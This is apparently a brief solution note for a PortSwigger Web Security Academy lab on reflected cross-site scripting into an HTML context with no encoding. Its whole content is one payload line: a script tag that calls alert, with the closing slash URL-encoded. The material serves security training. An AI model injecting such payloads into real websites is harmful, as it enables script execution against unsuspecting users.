Skip to content

Port Swigger Reflected XSS into HTML context with

Reflected XSS into HTML context with nothing encoded

Solution

Payload: <script>alert("hacked")<%2Fscript>